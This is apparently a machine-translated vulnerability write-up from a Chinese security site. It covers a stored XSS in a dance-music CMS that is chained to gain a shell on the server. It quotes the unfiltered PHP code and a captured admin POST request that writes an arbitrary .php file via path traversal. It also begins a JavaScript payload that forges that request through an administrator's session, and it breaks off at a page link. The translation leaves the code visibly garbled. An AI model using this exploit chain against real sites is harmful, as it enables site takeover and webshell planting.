Cheng's dance CMSPHP3. 0 stored xss getshell-a vulnerability warning-the black bar safety net

2013-10-20T00:00:00
ID MYHACK58:62201341007
Type myhack58
Reporter 佚名
Modified 2013-10-20T00:00:00

Description

This cms before 9 0 someone made a getshell,when is background verification file problem

The official website has been patched, so again, source

Because the backend login will also need the authentication code so the injection didn't see.

There xss

Vulnerability file user/member/skin_edit.php

<tr><td style=”height:130px;”><span><i>*</i>signature:

</span><textarea style=”width:435px;height:120px;” id=”content” name=”CS_Qianm”><? php echo $cscms_qianm?& gt;

</textarea></td></tr>

user/do.php

if($op==’zl’){ //data

if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))

exit(Msg_Error(‘sorry,Please put the information on completed!’,' javascript:history. go(-1);’));

$sql=”update “. Getdbname(‘user’).” set CS_Nichen=’”.$ CS_Nichen.”‘, CS_Email=’”.$ CS_Email.”‘,

CS_Sex=”.$ CS_Sex.”, CS_City=’”.$ CS_City.”‘, CS_QQ=’”.$ CS_QQ.”‘, CS_Qianm=’”.$ CS_Qianm.”‘

where CS_Name=’”.$ cscms_name.”‘”;

if($db->query($sql)){

exit(Msg_Error(‘congratulations, you successfully modified!’,' javascript:history. go(-1);’));

}else{

exit(Msg_Error(‘sorry, failed to modify!’,' javascript:history. go(-1);’));

}

No filter leads toxssis generated.

The background looked very weird is that you can write arbitrary format files.

Capture. in.

POST /admin/skins/skins. php? ac=xgmb&op=go&path=../../skins/index/html/ the HTTP/1.1

Accept: text/html, application/xhtml+xml, /

Referer: http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: 127.0.0.1

Content-Length: 3 8

DNT: 1

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2

_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%

2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7

_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa. php&content=%3Cs%3E%3Ca%2 5%3E

So construct a js as follows.

<script>

thisTHost = top. location. hostname;

thisTHost = “http://” + thisTHost + “/admin/skins/skins. php? ac=xgmb&op=go&path=../../skins/index/html/”;

function PostSubmit(url, data, msg) {

var postUrl = url;

var postData = data;

var msgData = msg;

var ExportForm = document. createElement(“FORM”);

document. body. appendChild(ExportForm);

ExportForm. method = “POST”;

var newElement = document. createElement(“input”);

newElement. setAttribute(“name”, “name”);

newElement. setAttribute(“type”, “hidden”);

var newElement2 = document. createElement(“input”);

newElement2. setAttribute(“name”, “content”);

newElement2. setAttribute(“type”, “hidden”);

ExportForm. appendChild(newElement);

ExportForm. appendChild(newElement2);

newElement. value = postData;

newElement2. value = msgData;

[1] [2] next